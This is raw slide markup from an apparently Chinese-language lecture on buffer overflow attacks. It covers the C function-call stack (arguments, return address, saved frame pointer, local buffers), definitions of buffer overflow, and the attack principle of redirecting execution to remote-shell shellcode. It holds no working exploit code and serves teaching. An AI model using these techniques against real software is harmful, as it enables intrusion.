            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>void main() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  function(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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zh-CN" sz="3600" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>语言函数调用过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613410" y="1476375"/>
            <a:ext cx="7486650" cy="4192905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的顺序将参数压栈；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>把指令指针</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(IP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>压栈，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>也称为返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(RET)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>FP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>压栈，被保存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>FP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SFP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>将当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>复制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>FP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，成为新的帧指针；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的值减小，为局部变量保留空间。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2563">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="322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2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2563">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="322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2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2563">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3225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2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2563">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3225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25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1150939" y="142875"/>
            <a:ext cx="6780082" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>语言函数调用过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323588" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="2992438"/>
            <a:ext cx="3384550" cy="639762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="008080"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>buffer1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323589" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="5003334"/>
            <a:ext cx="3390900" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323590" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="4642972"/>
            <a:ext cx="3384550" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323591" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="4282609"/>
            <a:ext cx="3384550" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323592" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="3922247"/>
            <a:ext cx="3384550" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323593" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="3563472"/>
            <a:ext cx="3384550" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323594" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="2057400"/>
            <a:ext cx="3384550" cy="1071563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>buffer2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323595" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5299075" y="1738002"/>
            <a:ext cx="3397056" cy="523220"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>堆栈顶部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内存低端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323596" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5332219" y="5211439"/>
            <a:ext cx="3363912" cy="523220"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>堆栈底部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内存高端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体"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sz="3600"/>
              <a:t>概念</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377373" y="1345707"/>
            <a:ext cx="8337420" cy="4943125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>缓冲区或缓存 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）：用户为程序运行时在计算机中申请得的一段连续的内存，它保存了给定类型的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）：计算机程序向缓冲区内填充的数据位数超过了缓冲区本身的容量，溢出的数据覆盖在合法数据上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>：（一般情况下，缓冲区溢出引起程序运行错误，但是在攻击者的设计下）向程序的缓冲区写入超出其长度的内容，造成缓冲区的溢出，从而破坏程序的正常执行流程，使程序转而执行其他的指令，以达到攻击的目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additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="290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0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zh-CN" altLang="en-US" sz="3600"/>
              <a:t>缓冲区溢出攻击的原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536892" y="1325879"/>
            <a:ext cx="8180388" cy="4892041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的原理：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过往程序缓冲区写入超过其边界的内容，造成缓冲区溢出，使得程序转而执行攻击者指定的代码，通常是为攻击者打开远程连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在能够被攻击的数据缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要有被执行的攻击代码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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="330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0755">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3307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07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0755">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3307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0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30755">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
